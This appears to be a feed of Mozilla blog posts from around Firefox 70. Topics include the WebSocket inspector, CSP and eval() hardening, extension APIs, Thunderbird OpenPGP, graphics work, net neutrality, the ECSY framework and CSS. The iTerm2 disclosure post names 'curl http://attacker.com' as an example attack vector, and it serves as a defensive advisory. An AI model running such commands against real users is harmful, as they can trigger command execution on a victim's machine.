hacks.mozilla.orgFirefox’s New WebSocket Inspector

The Firefox DevTools team and our contributors were hard at work over the summer, getting Firefox 70 jam-packed with improvements. We are especially excited about our new WebSocket inspection feature, because you told us in feedback how important it would be for your daily work.

To use the inspector now, download Firefox Developer Edition, open DevTools’ Network panel to find the Messages tab. Then, keep reading to learn more about WebSockets and the tricks that the new panel has up its sleeve.

But first, big thanks to Heng Yeow Tan, the Google Summer of Code (GSoC) student who’s responsible for the implementation.

A Primer on WebSockets

We use the WebSocket (WS) API to create a persistent connection between a client and server. Because the API sends and receives data at any time, it is used mainly in applications requiring real-time communication.

Although it is possible to work directly with the WS API, some existing libraries come in handy and help save time. These libraries can help with connection failures, proxies, authentication and authorization, scalability, and much more. The WS inspector in Firefox DevTools currently supports Socket.IO and SockJS, but more support is in the works.

Want to learn more about how to set up WebSocket for your client applications? Head over to MDN’s guides. In the meantime, let’s dive into the new feature.

Getting started with the WebSocket Inspector

The WebSocket Inspector is part of the existing Network panel UI in DevTools. It’s already possible to filter the content for opened WS connections in this panel, but till now there was no chance to see the actual data transferred through WS frames.

The following screenshot shows the WS filter in action. Only the 101 request (WebSocket Protocol Handshake) is visible. The response code indicates that the server is switching to WS connection.

A screenshot of the Network Monitor panel showing the WS inspection feature

Clicking on the 101 request opens the familiar sidebar, showing details about the selected HTTP request. In addition, the UI now offers a fresh new Messages panel that can be used to inspect WS frames sent and received through the selected WS connection.

The WS inspector in the Network Panel, showing messages

The live-updated table shows data for sent (green arrow) and received (red arrow) WS frames. Each frame expands on click, so you can inspect the formatted data.

To focus on specific messages, frames can be filtered free text.

A screenshot showing a test of the 101 response in the Messages panel

The Data and Time columns are visible by default, but you can customize the interface to see more columns by right-clicking on the header.

Screenshot showing Messages filtering options in Firefox Dev Tools panel

Selecting a frame in the list shows a preview at the bottom of the Messages panel.

Screenshot of Message showing plain text data sent over WebSocket connection

The inspector currently supports the following WS protocols – and we have more planned:

  • Plain JSON
  • Socket.IO
  • SockJS

Payload based on those protocols is parsed and displayed as an expandable tree for easy inspection. Of course, you can still see the raw data (as sent over the wire) as well.

Screenshot showing Messages sent via JSON and Socket.IO

Use the pause/resume button in the Network panel toolbar to stop intercepting WS traffic. This allows you to capture only the frames that you are interested in.

Screenshot of network monitor showing the pause/resume button for WS inspection

What’s next for the WebSockets inspector

We wanted to release this initial feature set quickly to let you use it. We have a few things that we are still working on for upcoming releases:

  • Binary payload viewer
  • Indicating closed connections
  • Exporting WS frames (as part of HAR)
  • See our backlog for more of what’s coming

We would love your feedback on the new WebSocket Inspector, which is available now in Firefox Developer Edition 70. If you haven’t had a chance yet, install and open Developer Edition, then follow along with this post to master WebSocket debugging.

The post Firefox’s New WebSocket Inspector appeared first on Mozilla Hacks - the Web developer blog.

Web Application SecurityHardening Firefox against Injection Attacks

A proven effective way to counter code injection attacks is to reduce the attack surface by removing potentially dangerous artifacts in the codebase and hence hardening the code at various levels. To make Firefox resilient against such code injection attacks, we removed occurrences of inline scripts as well as removed eval()-like functions.

Removing Inline Scripts and adding Guards to prevent Inline Script Execution

Firefox not only renders web pages on the internet but also ships with a variety of built-in pages, commonly referred to as about:pages. Such about: pages provide an interface to reveal internal state of the browser. Most prominently, about:config, which exposes an API to inspect and update preferences and settings which allows Firefox users to tailor their Firefox instance to their specific needs.

Since such about: pages are also implemented using HTML and JavaScript they are subject to the same security model as regular web pages and therefore not immune against code injection attacks. More figuratively, if an attacker manages to inject code into such an about: page, it potentially allows an attacker to execute the injected script code in the security context of the browser itself, hence allowing the attacker to perform arbitrary actions on the behalf of the user.

To better protect our users and to add an additional layer of security to Firefox, we rewrote all inline event handlers and moved all inline JavaScript code to packaged files for all 45 about: pages. This allowed us to apply a strong Content Security Policy (CSP) such as ‘default-src chrome:’ which ensures that injected JavaScript code does not execute. Instead JavaScript code only executes when loaded from a packaged resource using the internal chrome: protocol. Not allowing any inline script in any of the about: pages limits the attack surface of arbitrary code execution and hence provides a strong first line of defense against code injection attacks.

Removing eval()-like Functions and adding Runtime Assertions to prevent eval()

The JavaScript function eval(), along with the similar ‘new Function’ and ‘setTimeout()/setInterval()’, is a powerful yet dangerous tool. It parses and executes an arbitrary string in the same security context as itself. This execution scheme conveniently allows executing code generated at runtime or stored in non-script locations like the Document-Object Model (DOM). The downside however is that ‘eval()’ introduces significant attack surface for code injection and we discourage its use in favour of safer alternatives.

To further minimize the attack surface in Firefox and discourage the use of eval() we rewrote all use of ‘eval()’-like functions from system privileged contexts and from the parent process in the Firefox codebase. Additionally we added assertions, disallowing the use of ‘eval()’ and its relatives in system-privileged script contexts.

Unexpectedly, in our effort to monitor and remove all eval()-like functions we also encountered calls to eval() outside of our codebase. For some background, a long time ago, Firefox supported a mechanism which allowed you to execute user-supplied JavaScript in the execution context of the browser. Back then this feature, now considered a security risk, allowed you to customize Firefox at start up time and was called userChrome.js. After that mechanism was removed, users found a way to accomplish the same thing through a few other unintended tricks. Unfortunately we have no control of what users put in these customization files, but our runtime checks confirmed that in a few rare cases it included eval. When we detect that the user has enabled such tricks, we will disable our blocking mechanism and allow usage of eval().

Going forward, our introduced eval() assertions will continue to inform the Mozilla Security Team of yet unknown instances of eval() which we will closely audit and evaluate and restrict as we further harden the Firefox Security Landscape.

For the Mozilla Security Team,
Vinothkumar Nagasayanan, Jonas Allmann, Tom Ritter, and Christoph Kerschbaumer


The post Hardening Firefox against Injection Attacks appeared first on Mozilla Security Blog.

hacks.mozilla.orgThe Mozilla Developer Roadshow Talks: Firefox, WebAssembly, CSS, WebXR and More

The Mozilla Developer Roadshow program launched in 2017. Our mission: Bring expert speakers and technology updates to local communities through free events and partnerships. These interactive meetup-style events help developers find resources and activities relevant to their day-to-day productivity and professional skill development.

Dev Roadshow EU, August 2019

The roadshow through Germany and Austria featured four back-to-back evening events from August 26th-29th. In Nuremberg, Munich, Linz, and Vienna, we met over 400 local developers and designers in their hometowns. In fact, at every stop we found strong interest and lively curiosity about the web platform.

For this tour, Mozilla partnered with the beyond tellerrand team, led by Marc Thiele. And today, we’re excited to share the video recordings with you!

The Talks

Five Mozilla speakers presented in each city; we added guest speakers in Munich and Vienna. First up, Ali Spivak, Mozilla’s Director of Developer Relations, opened each session with an overview of Firefox and highlights from our emerging technology projects.

An Update on Firefox and Mozilla

In addition, each event included our signature networking hour. As always, we encouraged attendees and speakers to bridge the speaking stage gap. In this informal setting, we enjoyed real conversations about the real concerns of people who work on the web. Mozilla TechSpeakers Hui Jing Chen and Fabien Benetou joined the team, along with Mozilla Research Engineer Diane Hosfelt, and Developer Advocate Dan Callahan.

Understanding Modern CSS

XR in the Browser

Engineering for privacy in Mixed Reality

WebAssembly in the Browser and Beyond

Dev Roadshow Asia: Register now

In November, the Mozilla Developer Roadshow tour continues in Asia. Free tickets are now available, so you can register today for one of the following events:

Make sure to secure your spot by registering now!

The post The Mozilla Developer Roadshow Talks: Firefox, WebAssembly, CSS, WebXR and More appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Add-ons BlogExtensions in Firefox 70

Welcome to another round of new additions and changes to extensions, this time in Firefox 70. We have a new API, some improvements on existing APIs, and some great additions to Firefox Developer Tools to make it easier to debug your extensions.

Network Status

Firefox 70 features a new network status API. It can be used to determine if an internet connection is available and provides insight into what type of connection the user is on. A potential use case for this would be for developers to limit the data they are transferring on a mobile connection. Here is an example:

async function upload(url, buffer) {
  let info = await browser.networkStatus.getLinkInfo();
  let isMobile = ["wimax", "2g", "3g", "4g"].includes(info.type);

  // Only sending every second byte on mobile. Clever savings, eh?
  let body = buffer;
  if (isMobile) {
    body = body.filter((elem, index) => index % 2 == 0);

  console.log(`Uploading via ${info.type} connection named ${info.id}`);

  switch (info.status) {
    case "down":
      await handleOfflineMode(url, buffer);
    case "up":
    case "unknown":
      await fetch(url, {
        method: "POST",
        headers: { "Content-Type": "application/octet-stream" },
        body: body

There is also an onConnectionChanged event available that is called with the changed link info.

Downloads API Improvements

We’ve made a few improvements to the downloads API in Firefox 70. By popular request, the Referer header is now allowed in the browser.downloads.download API’s headers object. This allows extensions, such as download managers, to download files for sites that require a referrer to be set.

Also, we’ve improved error reporting for failed downloads. In addition to previously reported failures, the browser.downloads.download API will now report an error in case of various http 4xx failures. This makes the API more compatible with Chrome and gives developers a way to react to these errors in their code. [Edit: Sorry if I got your hopes up! This is actually coming in Firefox 71!]

Privacy API Improvements

If you are using the browser.privacy.network API and are modifying webRTCIPHandlingPolicy, we’ve made some compatibility changes to the disable_non_proxied_udp setting. This setting now better matches Chrome’s behavior. If your add-on relied on the Firefox-specific behavior, you can make use of the new setting proxy_only.

Extension Storage Inspector

Starting in Firefox 70, Firefox finally supports inspecting data from the browser.storage API using the Devtools Storage Inspector. When you inspect an add-on via about:debugging, you will find a new Extension Storage section in the storage panel. While changing the values is not currently supported, this will make debugging your add-ons even easier.

Firefox developer tools showing extension storage data in a multi-column list.

Extension Storage Inspector

Unsupported Theme Properties

The accentcolor, headerURL and text_color properties are now unsupported. Please make use of the replacement properties frame, theme_frame, and tab_background_text. You can find more information on our previous deprecation announcement.


  • When managing extension shortcuts, you will now be notified if a shortcut is already in use.
  • The browser.notifications.onClicked and browser.notifications.onShown event callbacks are no longer called with a superfluous second parameter.
  • Logging has been improved when the native messaging host manifest is missing.
  • Various performance improvements, making startup quicker for Firefox users with add-ons.

Special thanks this time goes to our volunteers Trishul Goel, Myeongjun Go, Graham McKnight and Tom Schuster. We’ve also received an awesome contribution from Mandy Cheang as part of her internship at Mozilla. Keep up the great work everyone!

The post Extensions in Firefox 70 appeared first on Mozilla Add-ons Blog.

Web Application SecurityCritical Security Issue identified in iTerm2 as part of Mozilla Open Source Audit

A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2. After finding the vulnerability, Mozilla, Radically Open Security (ROS, the firm that conducted the audit), and iTerm2’s developer George Nachman worked closely together to develop and release a patch to ensure users were no longer subject to this security threat. All users of iTerm2 should update immediately to the latest version (3.3.6) which has been published concurrent with this blog post.

Founded in 2015, MOSS broadens access, increases security, and empowers users by providing catalytic support to open source technologists. Track III of MOSS — created in the wake of the 2014 Heartbleed vulnerability — supports security audits for widely used open source technologies like iTerm2. Mozilla is an open source company, and the funding MOSS provides is one of the key ways that we continue to ensure the open source ecosystem is healthy and secure.

iTerm2 is one of the most popular terminal emulators in the world, and frequently used by developers. MOSS selected iTerm2 for a security audit because it processes untrusted data and it is widely used, including by high-risk targets (like developers and system administrators).

During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer. Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.

Proof-of-Concept video of a command being run on a mock victim’s machine after connecting to a malicious SSH server. In this case, only a calculator was opened as a placeholder for other, more nefarious commands.

Typically this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe there is a high degree of concern about the potential impact.

An update to iTerm2 is now available with a mitigation for this issue, which has been assigned CVE-2019-9535. While iTerm2 will eventually prompt you to update automatically, we recommend you proactively update by going to the iTerm2 menu and choosing Check for updates… The fix is available in version 3.3.6. A prior update was published earlier this week (3.3.5),  it does not contain the fix.

If you’d like to apply for funding or an audit from MOSS, you can find application links on the MOSS website.

The post Critical Security Issue identified in iTerm2 as part of Mozilla Open Source Audit appeared first on Mozilla Security Blog.

The Mozilla Thunderbird BlogThunderbird, Enigmail and OpenPGP

Today the Thunderbird project is happy to announce that for the future Thunderbird 78 release, planned for summer 2020, we will add built-in functionality for email encryption and digital signatures using the OpenPGP standard. This new functionality will replace the Enigmail add-on, which will continue to be supported until Thunderbird 68 end of life, in the Fall of 2020.

For some background on encrypted email in Thunderbird: Two popular technologies exist that add support for end-to-end encryption and digital signatures to email. Thunderbird has been offering built-in support for S/MIME for many years and will continue to do so.

The Enigmail Add-on has made it possible to use Thunderbird with external GnuPG software for OpenPGP messaging. Because the types of add-ons supported in Thunderbird will change with version 78, the current Thunderbird 68.x branch (maintained until Fall 2020) will be the last that can be used with Enigmail.

For users of Enigmail, Thunderbird 78 will offer assistance to migrate existing keys and settings. We are happy that Patrick Brunschwig, the long-time developer of Enigmail, has offered to work with the Thunderbird team on OpenPGP going forward. About this change, Patrick had this to say:

“It has always been my goal to have OpenPGP support included in the core Thunderbird product. Even though it will mark an end to a long story, after working on Enigmail for 17 years, I’m very happy with this outcome.”

Users who haven’t used Enigmail previously will need to opt in to use OpenPGP messaging, as encryption will not be enabled automatically. However, Thunderbird 78 will help users discover the new functionality.

To promote secure communication, Thunderbird 78 will encourage the user to perform ownership confirmation of keys used by correspondents, notify the user if the correspondent’s keys change unexpectedly, and, if there is an issue, offer assistance to resolve the situation.

It’s undecided whether Thunderbird 78 will support the indirect key ownership confirmations used in the Web of Trust (WoT) model, or to what extent. However, sharing of key ownership confirmations made by the user (key signatures), and interaction with OpenPGP key servers shall be possible.

If you have an interest in seeing more detailed plans on what is in store for OpenPGP in Thunderbird, check out our wiki page with more information.

Mozilla Gfx Teammoz://gfx newsletter #48

Greetings! This issue of the newsletter is long overdue. Without further ado:

What’s new in gfx

Wayland dmabuf textures

Martin Stransky landed the dmabuf texture work which was at the prototype stage at the time of the previous newsletter. This is only used with the GL compositor at the moment which is not enabled by default (gfx.acceleration.force-enabled pref in about:config). Work to get dmabuf textures with WebRender is in progress.

CoreAnimation integration

Markus landed a number of infrastructure changes towards integrating with CoreAnimation and doing partial present optimizations on MacOS.
This short description doesn’t do justice to the amount of work that went into this. Stay tuned, you might read some more about this on this blog soon.

Direct Composition integration

Sotaro has been working on a number of bugs in support for Direct Composition integration, including some ground work and investigation such as bugs 1585893, 1585619 and 1585278, and bug fixes like an issue involving the tab bar, direct composition, the high contrast theme and WebRender.


Andrew landed a number of image decoding performance improvements, using SIMD to speed up pixel format conversion.
Benchmarks targeting the improvements suggested a ceiling of 25-50% faster for pixel format conversions, initial telemetry data suggesting 5-10% real world average decoder performance improvement. Not bad!

What’s new in WebRender

WebRender is a GPU based 2D rendering engine for web written in Rust, currently powering Firefox‘s rendering engine as well as the research web browser servo.

To enable WebRender in Firefox, in the about:config, enable the pref gfx.webrender.all and restart the browser.

WebRender is available as a standalone crate on crates.io (documentation) for use in your own rust projects.

WebRender enabled in Firefox Preview Nightly on the Pixel 2

This is the first configuration on Android that Jamie enabled WebRender on by default. A pretty cool milestone to build upon!
Download it here: https://play.google.com/store/apps/details?id=org.mozilla.fenix.nightly
WebRender is only enabled by default for pixel 2 phones at the moment but on other configurations it can be enabled in about:config.

Pixel snapping

Andrew rewrote pixel snapping in WebRender. See the bug description and the six patches series that followed to get an idea of how much work went into this.

Blob image recoordination

If you have been following this newsletter you might remember reading hearing about “blob image recoordination” for a while now. That’s because work has been ongoing for quite a while. A lot of these patches that have been in the work for months landed recently. Blobs are now “recoordinated”.

In other words, Jeff and Nical landed a lot of infrastructure work went into handling the coordinate system of blob images, webrender’s fallback software rendering path.

This puts the fallback code on a saner foundation and allows reducing the invalidation of blob images in various scenarios such as scrolling large SVG elements, or when animations cause the bounds of a blob image to change. This translates to performance improvements on web pages that use SVG a lot.

Picture caching

Glenn landed some pretty big changes to picture caching:

  • The cache is now organized as a quad-tree.
  • Picture cached tiles that are only solid color use a fast path to optimize speed and memory consumption.
  • There is a new composite pass with a simpler drawing model than other render passes. It is a first step towards deferring the composition of cached tiles to OS compositor APIs such as Direct Composition and Core animation, and will allow optimizations for the upcoming software backend.
  • There are now separate picture cache slices for web content, the browser UI and scroll bars.
  • WebRender now generates dirty rects to allow partial present optimizations.

YUV image rendering performance

Kvark fixed YUV images being accidentally rendered in the alpha pass instead of the opaque pass. A very simple change yielding pretty significant performance improvements as it reduces the overdraw while rendering video frames.

Text rendering improvements

Lee removed Cairo usage from the Skia FreeType font host. SkFontHost_cairo depended on the interposition of Cairo for dealing with creating/loading FreeType faces. This imposed annoying limits on our Skia text rasterization such as a lack of sub-pixel text positioning on Android and Linux. It also forced us to build and maintain FcPattern structures that caused memory bloat and had performance overhead to interpret.
With this fixed, Lee enabled sub-pixel positioning on Linux and Android.

Various fixes and improvements

  • Botond fixed a regression affecting WebExtensions that move a tab into a popup or panel window (1), (2).
  • Botond fixed an issue that prevented Windows users with certain Acer and Asus laptops from being able to two-finger scroll on Gmail and various other websites.
  • Botond fixed one of the prerequisites for enabling a hiding URL bar in Firefox Preview.
  • Kvark improved WebRender’s performance when allocating a page requires a lot of cached texture memory.
  • Kvark added support for the Solus linux distribution in Gecko’s build system.
  • Kvark updated the WebGPU IDL
  • Kvark fixed a few IDL bindgen issues in the process (1), (2).
  • Andrew prevented border raster images from going through a slow fallback path.
  • AWilcox fixed YUV image rendering on big-endian machines.
  • Nical cleaned up a lot of the scene building and render graph code in WebRender.
  • Kris fixed an opacity rendering issue on SVG USE elements with D2D.
  • Jonathan Kew fixed a rendering issue with stroked text with ligatures.

The Mozilla BlogBreaking down this week’s net neutrality court decision

This week, the U.S. Court of Appeals for the D.C. Circuit issued its ruling in Mozilla v. Federal Communications Commission (FCC), the court case to defend net neutrality protections for American consumers. The opinion opened a path for states to put net neutrality protections in place, even as the fight over FCC federal regulation is set to continue. While the decision is disappointing as it failed to restore net neutrality protections at the federal level, the fight for these essential consumer rights will continue in the states, in Congress, and in the courts.

The three-judge panel disagreed with the FCC’s argument that the FCC is able to preempt state net neutrality legislation across the board. States have already shown that they are ready to step in and enact net neutrality rules to protect consumers, with laws in California and Vermont among others. The Court is also requiring the FCC to consider the effect the repeal may have on public safety and subsidies for low-income consumer broadband internet access.

The Court did find that the FCC had discretion to treat broadband access like an information service and remove the previous rules. But as Judge Millett said (and Judge Wilkins concurred), that was with significant reservations: “I am deeply concerned that the result [of upholding much of the 2018 Order] is unhinged from the realities of modern broadband service.” Nevertheless, the judges stated that they felt their hands were tied by the existing legal precedent and invited the Supreme Court or Congress to step in.

The decision also underscores the frailty of the FCC’s approach. Questioning the FCC’s reclassification of broadband internet access from a “telecommunications service” to an “information service,” Judge Millett reprised an argument made by Mozilla and other petitioners: “[F]ollowing the Commission’s view to its logical conclusion, everything (including telephones) would be an information service. The only thing left within ‘telecommunications service’ would be the proverbial road to nowhere.”

We are exploring next steps to move the case forward for consumers, and we are grateful to be a part of a broad community pressing for net neutrality protections. We look forward to continuing this fight.

The post Breaking down this week’s net neutrality court decision appeared first on The Mozilla Blog.

Mozilla VR BlogIntroducing ECSY: an Entity Component System framework for the Web

Introducing ECSY: an Entity Component System framework for the Web

Today we are introducing ECSY (Pronounced “eck-see”): a new -highly experimental- Entity Component System framework for Javascript.

After working on many interactive graphics projects for the web in the last few years we were trying to identify the common issues when developing something bigger than a simple example.
Based on our findings we discussed what an ideal framework would need:

  • Component-based: Help to structure and reuse code across multiple projects.
  • Predictable: Avoids random events or callbacks interrupting the main flow, which would make it hard to debug or trace what is going on in the application.
  • Good performance: Most web graphics applications are CPU bound, so we should focus on performance much more.
  • Simple API: The core API should be simple, making the framework easier to understand, optimize and contribute to; but also allow building more complex layers on top of it if needed.
  • Graphics engine agnostic: It should not be tied to any specific graphics engine or framework.

These requirements are high-level features that are not usually provided by graphics engines like three.js or babylon.js. On the other hand, A-Frame provides a nice component-based architecture, which is really handy when developing bigger projects, but it lacks the rest of the previously mentioned features. For example:

  • Performance: Dealing with the DOM implies overhead. Although we have been building A-Frame applications with good performance, this could be done by breaking the API contract, for example by accessing the values of the components directly instead of using setAttribute/getAttribute. This can lead to some unwanted side effects, such as incompatibility between components and a lack of reactive behavior.
  • Predictable: Dealing with asynchrony because of the DOM life cycle or the events’ callbacks when modifying attributes makes the code really hard to debug and to trace.
  • Graphics engine agnostic: Currently A-Frame and its components are so strongly tied to Three.js that it makes no sense to change it to any other engine.

After analyzing these points, gathering our experience with three.js and A-Frame, and looking at the state of the art on game engines like Unity, we decided to work on building this new framework using a pure Entity Component System architecture. The difference between a pure ECS like Unity DOTS, entt, or Entitas, and a more object oriented approach, such as Unity’s MonoBehaviour or A-Frame's Components, is that in the latter the components and systems both have logic and data, while with a pure ECS approach components just have data (without logic) and the logic resides in the systems.

Focusing on building a simple core for this new framework helps iterate faster when developing new applications and lets us implement new features on top of it as needed. It also allows us to use it with existing libraries as three.js, Babylon.js, Phaser, PixiJS, interacting directly with the DOM, Canvas or WebGL APIs, or prototype around new APIs as WebGPU, WebAssembly or WebWorkers.

Introducing ECSY: an Entity Component System framework for the Web Technology stack examples


We decided to use a data-oriented architecture as we noticed that having data and logic separated helps us better think about the structure of our applications. This also allows us to work internally on optimizations, for example how to store and access this data or how to get the advantage of parallelism for the logic.

The terms you must know in order to work with our framework are mostly the same as any other ECS:

  • Entities: Empty objects with unique IDs that can have multiple components attached to it.
  • Components: Different facets of an entity. ex: geometry, physics, hit points. Components only store data.
  • Systems: Where the logic is. They do the actual work by processing entities and modifying their components. They are data processors, basically.
  • Queries: Used by systems to determine which entities they are interested in, based on the components the entities own.
  • World: A container for entities, components, systems, and queries.

Introducing ECSY: an Entity Component System framework for the Web ECSY Architecture


So far all the information has been quite abstract, so let’s dig into a simple example to see how the API feels.

The example will consist of boxes and circles moving around the screen, nothing fancy but enough to understand how the API works.

We will start by defining components that will be attached to the entities in our application:

  • Position: The position of the entity on the screen.
  • Velocity: The speed and direction in which the entity moves.
  • Shape: The type of shape the entity has: circle or box.
    Now we will define the systems that will hold the logic in our application:
  • MovableSystem: It will look for entities that have speed and position and it will update their position component.
  • RendererSystem: It will paint the shapes at their current position.

Introducing ECSY: an Entity Component System framework for the Web Circles and balls example design

Below is the code for the example described, some parts have been omitted to abbreviate (Check the full source code on Github or Glitch)

We start by defining the components we will be using:

// Velocity component
class Velocity {
  constructor() {
    this.x = this.y = 0;

// Position component
class Position {
  constructor() {
    this.x = this.y = 0;

// Shape component
class Shape {
  constructor() {
    this.primitive = 'box';

// Renderable component
class Renderable extends TagComponent {}

Now we implement the two systems our example will use:

// MovableSystem
class MovableSystem extends System {
  // This method will get called on every frame by default
  execute(delta, time) {
    // Iterate through all the entities on the query
    this.queries.moving.results.forEach(entity => {
      var velocity = entity.getComponent(Velocity);
      var position = entity.getMutableComponent(Position);
      position.x += velocity.x * delta;
      position.y += velocity.y * delta;

      if (position.x > canvasWidth + SHAPE_HALF_SIZE) position.x = - SHAPE_HALF_SIZE;
      if (position.x < - SHAPE_HALF_SIZE) position.x = canvasWidth + SHAPE_HALF_SIZE;
      if (position.y > canvasHeight + SHAPE_HALF_SIZE) position.y = - SHAPE_HALF_SIZE;
      if (position.y < - SHAPE_HALF_SIZE) position.y = canvasHeight + SHAPE_HALF_SIZE;

// Define a query of entities that have "Velocity" and "Position" components
MovableSystem.queries = {
  moving: {
    components: [Velocity, Position]

// RendererSystem
class RendererSystem extends System {
  // This method will get called on every frame by default
  execute(delta, time) {

    ctx.globalAlpha = 1;
    ctx.fillStyle = "#ffffff";
    ctx.fillRect(0, 0, canvasWidth, canvasHeight);

    // Iterate through all the entities on the query
    this.queries.renderables.results.forEach(entity => {
      var shape = entity.getComponent(Shape);
      var position = entity.getComponent(Position);
      if (shape.primitive === 'box') {
      } else {
  // drawCircle and drawCircle hidden for simplification

// Define a query of entities that have "Renderable" and "Shape" components
RendererSystem.queries = {
  renderables: { components: [Renderable, Shape] }

We create a world and register the systems that it will use:

var world = new World();

We create some entities with random position, speed, and shape.

for (let i = 0; i < NUM_ELEMENTS; i++) {
    .addComponent(Velocity, getRandomVelocity())
    .addComponent(Shape, getRandomShape())
    .addComponent(Position, getRandomPosition())

Finally, we just have to update it on each frame:

function run() {
  // Compute delta and elapsed time
  var time = performance.now();
  var delta = time - lastTime;

  // Run all the systems
  world.execute(delta, time);

  lastTime = time;

var lastTime = performance.now();


The main features that the framework currently has are:

  • Engine/framework agnostic: You can use ECSY directly with whichever 2D or 3D engine you are already used to. We have provided some simple examples for Babylon.js, three.js, and 2D canvas. To make things even easier, we plan to release a set of bindings and helper components for the most commonly used engines, starting with three.js.
  • Focused on providing a simple, yet efficient API: We want to make sure to keep the API surface as small as possible, so that the core remains simple and is easy to maintain and optimize. More advanced features can be layered on top, rather than being baked into the core.
  • Designed to avoid garbage collection as much as possible: It will try to use pools for entities and components whenever possible, so objects won’t be allocated when adding new entities or components to the world.
  • Systems, entities, and components are scoped in a “world” instance: It means that we don’t register the components or systems on the global scope, allowing you to have multiple worlds or apps running on the same page without interferences between them.
  • Multiple queries per system: You can define as many queries per system as you want.
  • Reactive support:
    • Systems can react to changes in the entities and components
    • Systems can get mutable or immutable references to components on an entity.
  • Predictable:
    • Systems will always run in the order they were registered or based on a priority attribute.
    • Reactive events won’t generate “random” callbacks when emitted. Instead they will be queued and processed in order, when the listener systems are executed.
  • Modern Javascript: ES6, classes, modules

What’s next?

This project is still in its early days so you can expect a lot of changes with the API and many new features to arrive in the upcoming weeks. Some of the ideas we would like to work on are:

  • Syntactic sugar: As the API is still evolving we have not focused on adding a lot of syntactic sugar, so currently there are places where the code is very verbose.
  • Developer tools: In the coming weeks we plan to release a developer tools extension to visualize the status of the ECS on your application and help you debug and understand its status.
  • ecsy-three: As discussed previously ecsy is engine-agnostic, but we will be working on providing bindings for commonly used engines starting with three.js.
  • Declarative layer: Based on our experience working with A-Frame, we understand the value of having a declarative layer so we would like to experiment with that on ECSY too.
  • More examples: Keep using a diverse range of underlying APIs, such as canvas, WebGL and engines like three.js, babylon.js , etc.
  • Performance: We have not really dug into optimizations on the core and we plan to look into it in the upcoming weeks and we will be publishing some benchmarking and results. The main goal of this initial release was to have an API we like so we could then focus on the core in order to make it run as fast as possible.
    You may notice that ECSY is not focused on data-locality or memory layout as much as many native ECS engines. This has not been a priority in ECSY because in Javascript we have far less control over the way things are laid out in memory and how our code gets executed on the CPU. We get far bigger wins by focusing on preventing unnecessary garbage collection and optimizing for JIT. This story will change quite a bit with WASM, so it is certainly something we want to explore for ECSY in the future.
  • WASM: We want to try to implement parts of the core or some systems on WASM to take advantage of strict memory layout and parallelism by using WASM threads and SharedArrayBuffers.
  • WebWorkers: We will be working on examples showing how you can move systems to a worker to run them in parallel.

Please feel free to use Github to follow the development, request new features or file issues on bugs you find, our discourse forum to discuss how to use ecsy on your projects, and ecsy.io for more examples and documentation.

hacks.mozilla.orgWhy is CSS So Weird?

CSS is the design language of the web — one of three core web languages — but it also seems to be the most contentious and often perplexing. It’s too easy and too hard, too fragile and too resilient. Love it or hate it, CSS is weird: not quite markup, not quite programming in the common (imperative) sense, and nothing like the design programs we use for print. How did we get here?

I’ve seen some people claim that “CSS is for documents” — as though HTML and JavaScript weren’t also originally for documents. The entire web was for documents, but that hasn’t stopped us from pushing the medium to new extremes. This is a young platform, and all the core languages are growing fast, with CSS advancing leaps and bounds over the last few years.

But there is a real problem: the web is fundamentally device-agnostic, and therefor display-agnostic. The original website from CERN states the problem clearly:

This implies no device-specific markup, or anything which requires control over fonts or colors.

Here we are, putting fonts and colors on the web. But it’s worth taking a step back and asking: what does it even mean to design for an unknown and infinite canvas? This problem isn’t new, it’s not going away, and there are no simple answers – but if we’re going to talk about it, we have to understand the fundamental audacity of the task.

Design on the web will always be weird – but CSS is a living document, and we have the power to keep making it better.

The post Why is CSS So Weird? appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Add-ons BlogFriend of Add-ons: B.J. Herbison

Please meet our newest Friend of Add-ons, B.J. Herbison! B.J. is a longtime Mozillian and joined add-on content review team for addons.mozilla.org two years ago, where he helps quickly respond to spam submissions and ensures that public listings abide by Mozilla’s Acceptable Use Policy.

A software developer with a knack for finding bugs, B.J. is an avid user of ASan Nightly and is passionate about improving open source software. “The best experience is when I catch a bug in Nightly and it gets fixed before that code ships,” B.J. says. “It doesn’t happen every month, but it happens enough to feel good.”

Following his retirement in 2017, B.J. spends his time working on software and web development programs, volunteering at a local food pantry, and traveling the world with his wife. He also enjoys collecting and studying coins, and playing Dungeons and Dragons. “I’ve played D&D with some of the other players for over forty years, and some other players are under half my age,” B.J. says.

Thank you so much for your contributions to keeping our ecosystem safe and healthy, B.J.!

If you are interested in getting involved with the add-ons community, please take a look at our current contribution opportunities.

hacks.mozilla.orgVideo Shorts from Mozilla Developer

We’re excited to launch a new resource for people who build the web! It will include short videos, articles, demos, and tools that teach web technologies and standards, browser tools, compatibility, and more. No matter your experience level or job description, we’re all working together towards the future health of the web, and Mozilla is here to help.

Today we’re launching a new video channel, with a selection of shorts to kick things off. There are two in our “about:web” series on web technologies, and one in our “Firefox” series on browser tools for web professionals.

Get started with an intro to Dark Mode on the web, by Deja Hodge — and check out her dark mode demo.

Jen Simmons shows us how to access a handy third-panel in the Firefox Developer Tools, and toggle print preview mode.

If you’ve ever struggled to style lists with customized bullets and numbers, Miriam Suzanne has a video all about the ::marker pseudo-element and list counters. Watch the video, and go play with the demo on codepen.

To celebrate the launch, we’ll be releasing new videos every day this week! Check back to learn about several more Firefox tools like Screenshots and the CSS Track Changes panel, and a reflection on what makes CSS so weird. Over the next few months we’ll have new videos weekly (subscribe to the channel!), along with more articles, demos, and some exciting new open source tools.

The post Video Shorts from Mozilla Developer appeared first on Mozilla Hacks - the Web developer blog.

Mozilla L10NHere comes Pontoon’s new Translate application

If you have contributed to Mozilla’s localization in the past few years, chances are high that you have interacted with Pontoon’s translation page. That page is the most important one of the Pontoon web app, as it is where people can create, review and manage translations for most of the products Mozilla makes. Today we are happy to announce that we are soon going to release an entirely re-written version of that page, nicknamed “Translate.Next”. This post shares all the details about this release, and should answer the questions you might have about it.

What is Translate.Next?

